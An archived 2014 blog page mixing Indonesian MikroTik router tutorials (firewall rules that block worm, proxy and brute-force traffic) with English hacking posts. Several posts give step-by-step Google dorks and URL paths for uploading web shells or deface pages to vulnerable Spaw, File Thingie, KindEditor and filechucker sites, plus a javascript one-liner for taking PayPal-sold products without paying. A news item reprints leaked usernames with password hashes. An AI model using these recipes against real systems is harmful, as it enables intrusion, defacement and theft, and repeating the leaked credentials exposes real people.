Senin, 31 Maret 2014

Cara Mengatasi Lampu LED Mikrotik Kelap-Kelip

Saya punya Mikrotik RB751U-2HnD yang saya gunakan untuk hotspot di rumah. 3 bulan saya tinggal ke luar kota, ternyata Mikrotik nya rusak. Semua lampu LED nya kelap-kelip seperti lampu disco, kecuali LED wlan nya. Saya cari tahu, kenapa bisa begitu. Usut punya usut, ternyata Mikrotik ini sering dimatikan langsung tanpa shutdown yang benar. Saya kira Mikrotik nya sudah rusak, karena tidak bisa berjalan normal, dan tidak bisa diakses melalui winbox. 



Saya coba cari solusinya di internet, ternyata ada juga yang mengalami hal serupa. Mereka menyarankan untuk mengganti Power Supply original mikrotik 12 V DC dengan Power Supply lain yang punya tegangan lebih tinggi. Kemudian saya coba gunakan Power Supply lain dengan tegangan 15 V DC. Ternyata Mikrotik nya mau nyala, lampu LED nya tidak lagi kedap-kedip seperti lampu disco. Mikrotik bekerja dengan normal kembali. Saya juga bisa mengakses mikrotik nya via winbox dan setingan yang dulu pun tidak hilang.

Jadi, dari masalah Lampu LED Mikrotik Kelap-Kelip ini solusinya yaitu dengan mengganti power supply mikrotik. Saya sarankan untuk mengganti Power Supply nya dengan Power Supply original Mikrotik 24 V DC.

Untuk lebih jelasnya, liat video yang saya buat khusus untuk anda berikut ini :
 
Read more

Jumat, 28 Maret 2014

Android.Pjapps.B - New Android Trojan Reported By Symantec team

new-android-virus-reported-by-symantec

Earlier this month researcher from Symantec have found a new android rat named as "Dendroid". Today they reported another trojan  Android.Pjapps.B , new trojan specifically designed to target Android devices.

Android.Pjapps.B may arrive as a package with the following name com.mobile.app.writer.zhongguoyang

Once executed, the Trojan creates the following receivers:
  • com.android.main.SmsReceiver
  • com.android.main.ActionReceiver
When the Trojan is being installed  then it opens a back door on the compromised device and may perform the following actions: 
  • Send and monitor SMS messages
  • Read and write the user's browsing history and bookmarks
  • Install packages
  • Write to external storage
Symantec Security Response also gives some security measures to the users and administrators:-
  • Use a firewall to block all incoming connections from the Internet to services that should not be publicly available. By default, you should deny all incoming connections and only allow services you explicitly want to offer to the outside world.
  • Enforce a password policy. Complex passwords make it difficult to crack password files on compromised computers. This helps to prevent or limit damage when a computer is compromised.
  • Ensure that programs and users of the computer use the lowest level of privileges necessary to complete a task. When prompted for a root or UAC password, ensure that the program asking for administration-level access is a legitimate application.
  • Disable AutoPlay to prevent the automatic launching of executable files on network and removable drives, and disconnect the drives when not required. If write access is not required, enable read-only mode if the option is available.
  • Turn off file sharing if not needed. If file sharing is required, use ACLs and password protection to limit access. Disable anonymous access to shared folders. Grant access only to user accounts with strong passwords to folders that must be shared.
  • Turn off and remove unnecessary services. By default, many operating systems install auxiliary services that are not critical. These services are avenues of attack. If they are removed, threats have less avenues of attack.
  • If a threat exploits one or more network services, disable, or block access to, those services until a patch is applied.
  • Always keep your patch levels up-to-date, especially on computers that host public services and are accessible through the firewall, such as HTTP, FTP, mail, and DNS services.
  • Configure your email server to block or remove email that contains file attachments that are commonly used to spread threats, such as .vbs, .bat, .exe, .pif and .scr files.
  • Isolate compromised computers quickly to prevent threats from spreading further. Perform a forensic analysis and restore the computers using trusted media.
  • Train employees not to open attachments unless they are expecting them. Also, do not execute software that is downloaded from the Internet unless it has been scanned for viruses. Simply visiting a compromised Web site can cause infection if certain browser vulnerabilities are not patched.
  • If Bluetooth is not required for mobile devices, it should be turned off. If you require its use, ensure that the device's visibility is set to "Hidden" so that it cannot be scanned by other Bluetooth devices. If device pairing must be used, ensure that all devices are set to "Unauthorized", requiring authorization for each connection request. Do not accept applications that are unsigned or sent from unknown sources.
  • For further information on the terms used in this document, please refer to the Security Response glossary.
How to remove?? 
To remove this risk manually, please perform the following actions: 
  1. Open the Google Android Menu.
  2. Go to the Settings icon and select Applications.
  3. Next, click Manage.
  4. Select the application and click the Uninstall button.
Source: Cyberkendra
Read more

Kamis, 27 Maret 2014

Spaw Shell Upload Vulnerablity

Spaw Shell Upload Vulnerablity:Hello Friends, today I'm going to share another Shell upload Vulnerablity with you all called Spaw Shell Upload Vulnerablity.. 2016

Follow the Instructions:-

1). Go to google and paste one of the following dorks as you like :)
  inurl:"spaw2/dialogs/"
  inurl:"spaw2/uploads/files/"
2). You will get lots of results. Open any site..
For Example i got :- example.com/spaw2/dialogs/
3). Now replace spaw2/dialogs/ with
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
  So now our url will look like this :-
example.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
4). Now open the site and it will look like this->



5). Now upload your deface page.. :)

Happy Hacking..ONly for educational Purposes..

Tags:

Read more

Selasa, 18 Maret 2014

Memblokir Port Virus di Mikrotik Menggunakan Firewall

Penyebaran virus dan malware di jaringan dapat terjadi jika kita tidak selektif dalam mengaktifkan port apa saja yang digunakan. Untuk mengamankan jaringan dari penyebaran virus dan malware, kita dapat menutup port komunikasi yang tidak digunakan dan rentan dimanfaatkan oleh virus. Caranya dengan menggunakan rule firewall Mikrotik untuk men-drop paket yang masuk ke port yang tidak digunakan.

Caranya sangat mudah, silakan anda copy paste command berikut ini ke terminal Mikrotik :


/ ip firewall filter
add chain=virus protocol=tcp dst-port=135-139 action=drop comment="Blaster Worm"
add chain=virus protocol=udp dst-port=135-139 action=drop comment="Messenger Worm"
add chain=virus protocol=tcp dst-port=445 action=drop comment="Blaster Worm"
add chain=virus protocol=udp dst-port=445 action=drop comment="Blaster Worm"
add chain=virus protocol=tcp dst-port=593 action=drop comment="________"
add chain=virus protocol=tcp dst-port=1024-1030 action=drop comment="________"
add chain=virus protocol=tcp dst-port=1080 action=drop comment="Drop MyDoom"
add chain=virus protocol=tcp dst-port=1214 action=drop comment="________"
add chain=virus protocol=tcp dst-port=1363 action=drop comment="ndm requester"
add chain=virus protocol=tcp dst-port=1364 action=drop comment="ndm server"
add chain=virus protocol=tcp dst-port=1368 action=drop comment="screen cast"
add chain=virus protocol=tcp dst-port=1373 action=drop comment="hromgrafx"
add chain=virus protocol=tcp dst-port=1377 action=drop comment="cichlid"

add chain=virus protocol=tcp dst-port=2745 action=drop comment="Bagle Virus"
add chain=virus protocol=tcp dst-port=2283 action=drop comment="Dumaru.Y"
add chain=virus protocol=tcp dst-port=2535 action=drop comment="Beagle"
add chain=virus protocol=tcp dst-port=2745 action=drop comment="Beagle.C-K"
add chain=virus protocol=tcp dst-port=3127-3128 action=drop comment="MyDoom"
add chain=virus protocol=tcp dst-port=3410 action=drop comment="Backdoor OptixPro"
add chain=virus protocol=tcp dst-port=4444 action=drop comment="Worm"
add chain=virus protocol=udp dst-port=4444 action=drop comment="Worm"
add chain=virus protocol=tcp dst-port=5554 action=drop comment="Drop Sasser"
add chain=virus protocol=tcp dst-port=8866 action=drop comment="Drop Beagle.B"
add chain=virus protocol=tcp dst-port=9898 action=drop comment="Drop Dabber.A-B"
add chain=virus protocol=tcp dst-port=10000 action=drop comment="Drop Dumaru.Y"
add chain=virus protocol=tcp dst-port=10080 action=drop comment="Drop MyDoom.B"
add chain=virus protocol=tcp dst-port=12345 action=drop comment="Drop NetBus"
add chain=virus protocol=tcp dst-port=17300 action=drop comment="Drop Kuang2"
add chain=virus protocol=tcp dst-port=27374 action=drop comment="Drop SubSeven"
add chain=virus protocol=tcp dst-port=65506 action=drop comment="Drop PhatBot,Agobot, Gaobot"
add chain=virus protocol=udp dst-port=12667 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=udp dst-port=27665 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=udp dst-port=31335 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=udp dst-port=27444 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=udp dst-port=34555 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=udp dst-port=35555 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=tcp dst-port=27444 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=tcp dst-port=27665 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=tcp dst-port=31335 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=tcp dst-port=31846 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=tcp dst-port=34555 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=tcp dst-port=35555 action=drop comment="Trinoo" disabled=no
add action=drop chain=forward comment=";;Block W32.Kido - Conficker" disabled=no protocol=udp src-port=135-139,445
add action=drop chain=forward comment="" disabled=no dst-port=135-139,445 protocol=udp
add action=drop chain=forward comment="" disabled=no protocol=tcp src-port=135-139,445,593
add action=drop chain=forward comment="" disabled=no dst-port=135-139,445,593 protocol=tcp
add action=accept chain=input comment="Allow limited pings" disabled=no limit=50/5s,2 protocol=icmp
add action=accept chain=input comment="" disabled=no limit=50/5s,2 protocol=icmp
add action=drop chain=input comment="drop FTP Brute Forcers" disabled=no dst-port=21 protocol=tcp src-address-list=FTP_BlackList
add action=drop chain=input comment="" disabled=no dst-port=21 protocol=tcp src-address-list=FTP_BlackList
add action=accept chain=output comment="" content="530 Login incorrect" disabled=no dst-limit=1/1m,9,dst-address/1m protocol=tcp
add action=add-dst-to-address-list address-list=FTP_BlackList address-list-timeout=1d chain=output comment="" content="530 Login incorrect" disabled=no protocol=tcp
add action=drop chain=input comment="drop SSH&TELNET Brute Forcers" disabled=no dst-port=22-23 protocol=tcp src-address-list=IP_BlackList
add action=add-src-to-address-list address-list=IP_BlackList address-list-timeout=1d chain=input comment="" connection-state=new disabled=no dst-port=22-23 protocol=tcp src-address-list=SSH_BlackList_3
add action=add-src-to-address-list address-list=SSH_BlackList_3 address-list-timeout=1m chain=input comment="" connection-state=new disabled=no dst-port=22-23 protocol=tcp src-address-list=SSH_BlackList_2
add action=add-src-to-address-list address-list=SSH_BlackList_2 address-list-timeout=1m chain=input comment="" connection-state=new disabled=no dst-port=22-23 protocol=tcp src-address-list=SSH_BlackList_1
add action=add-src-to-address-list address-list=SSH_BlackList_1 address-list-timeout=1m chain=input comment="" connection-state=new disabled=no dst-port=22-23 protocol=tcp
add action=drop chain=input comment="drop port scanners" disabled=no src-address-list=port_scanners
add action=add-src-to-address-list address-list=port_scanners address-list-timeout=2w chain=input comment="" disabled=no protocol=tcp tcp-flags=fin,!syn,!rst,!psh,!ack,!urg
add action=add-src-to-address-list address-list=port_scanners address-list-timeout=2w chain=input comment="" disabled=no protocol=tcp tcp-flags=fin,syn
add action=add-src-to-address-list address-list=port_scanners address-list-timeout=2w chain=input comment="" disabled=no protocol=tcp tcp-flags=syn,rst
add action=add-src-to-address-list address-list=port_scanners address-list-timeout=2w chain=input comment="" disabled=no protocol=tcp tcp-flags=fin,psh,urg,!syn,!rst,!ack
add action=add-src-to-address-list address-list=port_scanners address-list-timeout=2w chain=input comment="" disabled=no protocol=tcp tcp-flags=fin,syn,rst,psh,ack,urg
add action=add-src-to-address-list address-list=port_scanners address-list-timeout=2w chain=input comment="" disabled=no protocol=tcp tcp-flags=!fin,!syn,!rst,!psh,!ack,!urg
Hasilnya akan jadi seperti ini :


Nah, sekarang kita sudah berhasil Memblokir Port Virus Menggunakan Firewall di Mikrotik.
Semoga bermanfaat :)
Read more

Minggu, 16 Maret 2014

Paypal Javascript Exploit - Get Products Free

In this Tutorial we are talking about Paypal Javascript  Exploit. So Here is a simple JavaScript exploit through which you can hack Paypal & download products for free without spending single penny . More then 500 sites are Vulnerable !! .



So lets start..! ;)

Follow The Instructions:-


1). Go to the vulnerable site & paste the below JavaScript given below in the browser & hit enter !!.


javascript:top.location=document.getElementsByName('return')[0].value; javascript:void(0);




2). So after you have hit enter, just sit back & enjoy the free product .


3). So after you paste the JavaScript in the URL then the product will be automatically downloaded :)





More Vulnerable sites link -

 Click Here  (some sites are patched)
&

Enjoy...!!
Read more

Sabtu, 15 Maret 2014

Testing Image Shell and Deface Upload Vulnerability


In this tutorial we are talking about Testing Image Shell and Deface Upload Vulnerability. So lets start..

Follow the Instructions:


1). Search the following dorks.

Dorks:
inurl:"modules/filemanagermodule/actions/?picker.php??id=0"
intitle:"Testing Image Collections"

2). Use both Google and Bing to search the above dork to find more vulnerable websites. 

3). Select any Website from the search result.Find the upload option. in the bottom left corner..





4). Now, Select your deface or Shell and Upload it.

To view your Uploaded shell or deface visit:
http://website.com/files/yourfilehere  

 http://websites.com/path/yourfilehere

Happy Hacking!! Only for Educational purposes..!!

Read more

Madleets Got Hacked and Data Leaked




Untitled2


The one of famous Pakistan hacking group Team Madleets hacked and their users leaked .The hacker  with the handle name “Dukhi Nawab” hacked and leaked the Madleets Admin and Moderator details before few minutes. Their team know as “PakBug” . PakBugs / Xploiter Crew hacked madleets 2nd time . Two months ago the owner of Xploiter Crew also Defaced the Madleets subdomains . The Hacker did not defaced the Website he just leaked the data.
Dukhi Nawab says:-
MadLeets HaCked And Data Leaked By DuKhi NawaB (PAKbugs jr)
Too long db, got bored to leak all.. ;) anyways remember that maddies we are ur daddies..
And neXt time secure your ass..
greetz ; ZombiE_KsA, stoKer, Xploiter & Dr.Freak

Leaked Database :-

1      1337                   1733bab470835253a22231dab3fe3dca

2      h4x0rl1Æ’3                ac39d4fe6fdb8ce21c72e4efaefd6e73

3      Tor Demon           8d685488c51f1497beb2863f7503b224

4      MindCracker              f4f7d36949cad89ff77379598069109b

More Database :- Click here
Read more

Jumat, 14 Maret 2014

File Thingie Shell Upload Exploit Vulnerablity


shell upload


This is a vulnerability which allows a remote attacker to upload his/her deface or shell on the website.

Follow the Steps=>

1). Go to google and search this dork. :)
Google Dork : inurl:ft2.php intext:upload

2). After the searching the above dork, you will get websites vulnerable to this. 

3). Select any website, upload your deface or shell there.

shell upload

4). To view your deface or shell, just click on your file name after its uploaded.

shell upload

Happy Hacking .ONly for Educational Purposes ..!!!!!

File Thingie Shell Upload Exploit Vulnerablity
File Thingie Shell Upload
File Thingie Exploit
Read more

Rabu, 12 Maret 2014

Cara Export & Import Konfigurasi/Setingan Mikrotik

Export & Import Konfigurasi/Setingan Mikrotik hampir sama dengan melakukan backup & restore seperti yang sudah pernah saya bahas disini :  

Bedanya Export - Import dengan Backup - Restore :
1. File hasil backup tidak bisa dibuka di notepad PC, sedangkan file hasil export bisa.
2. File hasil export berisi script konfigurasi/setingan Mikrotik yang dapat langsung di copy-paste dan dieksekusi di terminal Mikrotik.

Jadi, fitur Export ini dapat digunakan untuk melihat konfigurasi Mikrotik dalam bentuk script (command line). File ini juga bisa digunakan untuk import konfigurasi Mikrotik, sama halnya dengan fungsi Backup - Restore Mikrotik.

Cara Export & Import Konfigurasi/Setingan Mikrotik sebagai berikut :
1. Buka terminal  masukkan command berikut :
export file=namafile
Ganti namafile sesuai keinginan anda.


Selain itu kita juga bisa melakukan export untuk konfigurasi spesifik, misal mau export konfigurasi firewall saja jadi command nya gini :
ip firewall export file=namafile
2. Hasil file export nya tersimpan di file, coba lihat dengan command 
file print

3. Untuk meng-copy file konfigurasi tersebut, buka menu file --> pilih file konfigurasi mana saja yang mau di-copy --> klik tombol copy di toolbar --> masuk ke folder Windows Explorer --> Paste di folder mana terserah anda.


4. Extensi file export ini adalah .rsc. Kita bisa membuka file ini dengan notepad.



5. Jika ingin meng-import file konfigurasi ini buka terminal --> ketikkan command :
import file-name=namafile

Oke, demikianlah tutorial mikrotik tentang Cara Export & Import Konfigurasi/Setingan Mikrotik.
Semoga bermanfaat :)
Read more

Cara Memblokir Penggunaan Web Proxy External di Mikrotik

Web Proxy external dapat digunakan untuk mem-bypass firewall dan membuka situs yang tadinya diblokir. Hal ini tentunya bisa bikin kita gigit jari, ketika sudah susah payah bikin sistem dengan firewall untuk memblokir situs macam-macam, ternyata client menggunakan proxy untuk mem-bypass firewall nya. Cape deh.. 

Nah, supaya client tidak bisa menggunakan proxy external untuk mem-bypass firewall, kita perlu memblokir penggunaan web proxy external dengan menggunakan Mikrotik. Caranya dengan membuat rule firewall mikrotik yang memblokir penggunaan port proxy. Hal ini dapat mencegah user/client untuk menggunakan proxy.

Ok, langsung saja ya ikuti Cara Memblokir Penggunaan Web Proxy External di Mikrotik berikut ini :
1. Jika anda menggunakan web proxy internal di Mikrotik, pastikan port nya diganti ke port yang tidak biasa dipake proxy, misalnya port 88


2. Jika anda menggunakan mode transparent proxy, pastikan port redirect nya juga sudah diganti ke port baru, misalnya port 88



3. Buat rule firewall baru dengan melakukan "drop" semua port yang digunakan oleh proxy. Anda bisa copy - paste script berikut ini di terminal :
/ip firewall filter
add action=drop chain=forward comment="Blokir Proxy Port #1" dst-port=\
    3128,54321,6515,6666,8000,8001,8008,808,8080,8081,8088 protocol=tcp \
    src-address=0.0.0.0/0
add action=drop chain=forward comment="Blokir Proxy Port #2" dst-port=\
    8090,81,8118,8181,82,83,84,85,86,8888,8909,9000,9090 protocol=tcp \
    src-address=0.0.0.0/0
4. Jika anda menemukan port lain yang digunakan proxy, silakan ditambahkan sendiri ya.

5. Berikut contoh penggunaannya ketika saya mencoba membuka sebuah web yang diblokir :
=> Sebelum menggunakan proxy

=> Menggunakan proxy

=> Setelah port proxy di "drop"

Nah, jadi dengan trik ini kita bisa mencegah user/client untuk menggunakan proxy selama port proxy yang mereka gunakan sudah masuk ke daftar blokir. 
Oke, demikianlah tutorial mikrotik tentang Cara Memblokir Penggunaan Web Proxy External di Mikrotik. Silakan dicoba dan semoga bermanfaat :)
Read more

Selasa, 11 Maret 2014

How To Tag All Friends In A Click In Facebook 2014

Facebook is one of the great platform to promote your business and if you have lot of friends in your account then you can promote it very fastly. Facebook tagging process is forced other friends to visit our status or pictures that's why most of friends are disliking this feature but here we are going to show you a magic of amazing script which will tag your all friends in a single click within a minute.

Facebook tagging is one of the main weapon to increase visitor in our status or pictures, but tagging one by one manually is not a easy deal so here in this tutorial I am going to show you one simple script which will tag all friends in a single click.

Steps To Follow For tagging All Friends In A single Click :


  • Login Facebook in Google Chrome Bowser.
  • Post Your Status.
  • Now click on time of your status so that it will open in new tab along with your status link.


  • Now press CTRL+SHIFT+J , now you can see a new window, just move onto CONSOLE tab.

  • Now copy below given script and paste it in CONSOLE tab .
&

  • After pasting script, now finally press ENTER and enjoy.



You're  Done !! Now just wait and watch the magic of this script.  It will automatically Tag your all friends in a click.

Hope you loved this amazing script, please like this post for our appreciation. Thanks for visiting Hackers Store



Read more

Senin, 10 Maret 2014

Justin Beiber Twitter account hacked, Targeted 50 Million users

Justin Beiber Twitter account hacked, Targeted 50 Million users, twitter hacked, hacking twitter, Justin Beiber twitter account, Justin Beiber hacked, Justin Beiber news, Justin Beiber fans , hackers hacking Justin Beiber, hacker hacking twitter, cyber crime, twitter vulnerability

Popular Pop Singer Justin Bieber official twitter account got hacked today. The twitter account have the 50.3 million of the followers, which is the second most twitter follower account. Hacker have hacked into the accounts and tweeted with a link which directed to the malicious app named as "ShotingStarPro".


Hacker tweeted in Indonesian language reading “Justin Bieber Cemberut?”, means - "Justin Bieber sullen?". It can also be says that twitter account was hacked by any Indonesian hacker. Spammed tweet contains the link that was redirected to the website rumahfollowers[dot]tk , that host "ShotingStarPro" app. 

Soon after the hack Justin team have recovered the accounts. Team had deleted the spam tweets and made respons tweet, saying "All good now. We handled it.". He also warned his followers, "That link from earlier. Don’t click it. Virus. Going to erase this now. Spread the word. Thanks."

 As account have been recovered after 15 minutes of the hack, but the spam link that have posted by hacker should have compromised thousand of Justin's followers accounts. 

We like to tell all you people that , if you are one among them then immediately change your password and set new, unique and strong password. We also recommend that do review all the apps that you have associated with your accounts. and revoke all the malicious apps from your account, specially this recent one.
Read more

File upload vulnerability


1). Go to Google.com and type given below dork..
 allinurl: /cgi-bin/filechucker.cgi



2). Choose a site having title like “Upload a file”,

3). Fill all the fields and upload your deface page or shell..! 
4). Its Uploded :D You just hacked a site !!
As said above now we just have to upload our Deface page here the file uploaded url is given in example if not given you can found your uploaded file at.
example.com/upload/files     or
example.com/upload/userfiles
Here we have uploded our deface page...


Only for Educational purposes..!!
Read more

Tutorial on Defacing with KindEditor Vulnerability


shell upload

Note==>Tutorial is only for Educational purpose and Hackers Store claims no responsibility on how you use it...

Follow The Steps==>


STEP 1: Go to http://www.google.com/

STEP 2: Copy and Paste this dork

inurl:examples/uploadbutton.html

STEP 3:
 Choose any site target, then put this exploit behind the site url and enter

/kindeditor/examples/uploadbutton.html

Examples: www.sitetarget.com/kindeditor/examples/uploadbutton.html

STEP 4: After put the exploit, you will see 'upload button'. Click the 'upload button' and choose your Deface Page

STEP 5: If your Deface Page file successfully uploaded, copy the link given beside the 'uplaod button' and paste it behind the url site..


shell upload

Examples: www.sitetarget.com/(url given)
its just for Educational purpose....!!!

Read more

Congo NIC and Official Domain Registry hacked by Leet


Once a popular hacker "Leet" from Pakistani hacker team "Madleet" have back into the cyber world with its hack. This time also hacker have hacked and deface the some of the high profiled site. Today hacker LEET have hacked the Domain Registry of Democratic Republic of the Congo (nic.cd).



Domain Registry of Democratic Republic of the Congo (nic.cd) is responsible for providing all the high profiles local countries domain for the firms as like Amazon, Microsoft, Godaddy and so on.
Hacker have hacked into the system of the domain registrar and able to change DNS of all the site hosted on the server to its own DNS. 

Earlier also hacker have hacked numerous high profiled site which includes, domains of Google, Microsoft, and many of NIC domains with the same method called DNS poisoning. 

At the time of writing all the sites are still showing the deface page. You all can check the list of the site deface and its mirror on the Zone-H

Read more